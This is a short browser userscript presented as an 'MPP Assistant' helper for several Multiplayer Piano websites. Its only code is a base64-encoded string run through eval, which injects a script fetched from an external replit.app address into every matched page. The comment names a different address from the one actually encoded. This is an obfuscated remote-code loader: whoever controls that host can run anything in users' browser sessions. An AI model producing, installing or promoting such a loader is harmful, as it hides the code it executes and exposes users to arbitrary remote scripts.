RoxasYTB / MPP Assistant by RoxasYTB

// ==UserScript==
// @license      MIT
// @name         MPP Assistant by RoxasYTB
// @namespace    http://tampermonkey.net/
// @version      0.2
// @description  For Multiplayer Piano
// @author       RoxasYTB
// @match      *://multiplayerpiano.net/*
// @match      *://multiplayerpiano.org/*
// @match      *://mppclone.com/*
// @match      *://mpp.terrium.net/*
// @match      *://piano.ourworldofpixels.com/*
// @grant        none
// ==/UserScript==

(function () {
  //Just execute it and see what you can do in console, and have fun !
  //This code execute an other external script from https://roxasytb.repl.co/ir.js and this is the shortcut of it in one line
 eval(atob('KHM9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0IikpLnNyYz0iaHR0cHM6Ly9yb3hhc3l0Yi5yZXBsaXQuYXBwL2lyLmpzIixkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKHMp'))
})();